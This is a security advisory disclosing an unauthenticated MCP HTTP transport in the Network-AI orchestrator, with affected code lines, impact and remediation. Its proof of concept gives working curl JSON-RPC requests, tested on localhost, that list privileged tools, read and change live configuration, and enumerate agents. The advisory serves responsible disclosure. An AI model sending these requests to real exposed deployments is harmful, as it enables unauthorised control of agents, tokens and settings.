Network-AI CVE-2026-42856

Security Advisory: Missing Authentication for Critical Function in Jovancoding/Network-AI

Summary

The MCP HTTP transport accepts JSON-RPC tools/call requests with no authentication, session, origin, or token check, and dispatches them directly to the orchestrator's tool registry. The default bind address is 0.0.0.0. As a result, any party with network reachability to the service can enumerate and invoke privileged management tools - including reading and mutating the live orchestrator configuration, listing registered agents, dispatching agents, creating/revoking security tokens, and adjusting global budget ceilings.

Affected Code

• bin/mcp-server.ts:75 - server binds to 0.0.0.0 by default.
• lib/mcp-transport-sse.ts:155 - handleRPC() dispatches tools/call directly to the provider's call(toolName, toolArgs).
• lib/mcp-transport-sse.ts:379 - _handlePost() parses the JSON-RPC body and calls this._bridge.handleRPC(rpc) with no auth check.
• lib/mcp-tools-control.ts:80 - config_get exposes live runtime configuration.
• lib/mcp-tools-control.ts:197 - agent_list exposes registered agents.
• lib/mcp-tools-control.ts:231 - config_set mutates runtime configuration in place: this._config[key] = parsed.

Proof of Concept

The PoC was executed against a local Docker build of the affected commit, bound to http://localhost:13001. No authentication header was sent. All inner-JSON excerpts below are decoded from the JSON-RPC result.content[0].text field for readability; the raw wire transcripts (which contain the literal escaped JSON-RPC envelope) are in evidence/.

Step 1 - list exposed tools (unauthenticated)

curl http://localhost:13001/tools

HTTP/1.1 200 OK - body returned 22 tools. Privileged tools observed in the inventory include:

• config_get, config_set - read and mutate live orchestrator configuration
• agent_list, agent_spawn, agent_stop - enumerate, dispatch, and stop agents
• token_create, token_revoke - mint and revoke security tokens
• budget_set_ceiling - adjust the global token budget ceiling
• fsm_transition - drive finite-state-machine transitions
• blackboard_write, blackboard_delete - mutate the shared blackboard

Full transcript: evidence/01_get_tools.txt.

Step 2 - read live configuration (unauthenticated)

curl http://localhost:13001/mcp \
  -H 'Content-Type: application/json' \
  -d '{"jsonrpc":"2.0","id":1,"method":"tools/call","params":{"name":"config_get","arguments":{}}}'

HTTP/1.1 200 OK - decoded inner JSON:

{
  "ok": true,
  "tool": "config_get",
  "data": {
    "blackboardPath": "./swarm-blackboard.md",
    "maxParallelAgents": null,
    "defaultTimeout": 30000,
    "enableTracing": true,
    "grantTokenTTL": 300000,
    "maxBlackboardValueSize": 1048576,
    "auditLogPath": "./data/audit_log.jsonl",
    "trustConfigPath": "./data/trust_levels.json"
  }
}

Full transcript: evidence/02_config_get_before.txt.

Step 3 - mutate live configuration (unauthenticated)

curl http://localhost:13001/mcp \
  -H 'Content-Type: application/json' \
  -d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"config_set","arguments":{"key":"defaultTimeout","value":"12345"}}}'

HTTP/1.1 200 OK - decoded inner JSON:

{
  "ok": true,
  "tool": "config_set",
  "data": {
    "key": "defaultTimeout",
    "previous": 30000,
    "current": 12345,
    "applied": true
  }
}

Full transcript: evidence/03_config_set.txt.

Step 4 - confirm mutation persisted (unauthenticated)

curl http://localhost:13001/mcp \
  -H 'Content-Type: application/json' \
  -d '{"jsonrpc":"2.0","id":3,"method":"tools/call","params":{"name":"config_get","arguments":{}}}'

HTTP/1.1 200 OK - decoded inner JSON (relevant key only):

{
  "ok": true,
  "tool": "config_get",
  "data": {
    "defaultTimeout": 12345
  }
}

This proves the runtime change applied by step 3 is observable on the next read. Full transcript: evidence/04_config_get_after.txt.

Step 5 - enumerate registered agents (unauthenticated)

curl http://localhost:13001/mcp \
  -H 'Content-Type: application/json' \
  -d '{"jsonrpc":"2.0","id":4,"method":"tools/call","params":{"name":"agent_list","arguments":{}}}'

HTTP/1.1 200 OK - decoded inner JSON:

{
  "ok": true,
  "tool": "agent_list",
  "data": {
    "agents": [],
    "count": 0
  }
}

This is a privileged management read; the empty array reflects the test environment, not a control. Full transcript: evidence/05_agent_list.txt.

Cleanup - runtime state restored

After the PoC, defaultTimeout was restored to 30000 via the same unauthenticated config_set (previous":12345,"current":30000,"applied":true). All testing was performed against a local Docker container only.

Impact

• Unauthenticated network access enables full enumeration and invocation of the orchestrator's management functionality.
• An attacker can change runtime configuration (e.g., defaultTimeout, enableTracing), dispatch or stop agents, mutate the shared blackboard, mint or revoke security tokens, and adjust global budget ceilings.
• The default 0.0.0.0 bind, combined with the absence of any auth gate, increases the likelihood of accidental exposure on any host with a routable interface.

Suggested Remediation

1. Enforce authentication inside _handlePost() before reaching handleRPC(). At a minimum, require a shared secret / bearer token loaded from configuration; reject any request that does not present it.
2. Default the bind address to 127.0.0.1. Require an explicit configuration opt-in to bind to non-loopback interfaces, and warn on startup when binding outside loopback without an authentication mechanism configured.
3. For tool-level defense in depth, gate state-mutating tools (config_set, agent_spawn, agent_stop, token_create, token_revoke, budget_set_ceiling, fsm_transition, blackboard_write, blackboard_delete) behind an explicit authorization check tied to a verified caller identity.

Verification Environment

• Local Docker container only; no third-party deployment was tested.
• Local build required a minimal Dockerfile fix; the application code path under test was not modified.
• Runtime state (defaultTimeout) was restored to default after the PoC.

Attached Evidence

Files in evidence/ are raw curl -i transcripts captured during the verification sequence above. They are provided as supplementary backup; the key excerpts are already inlined in this report.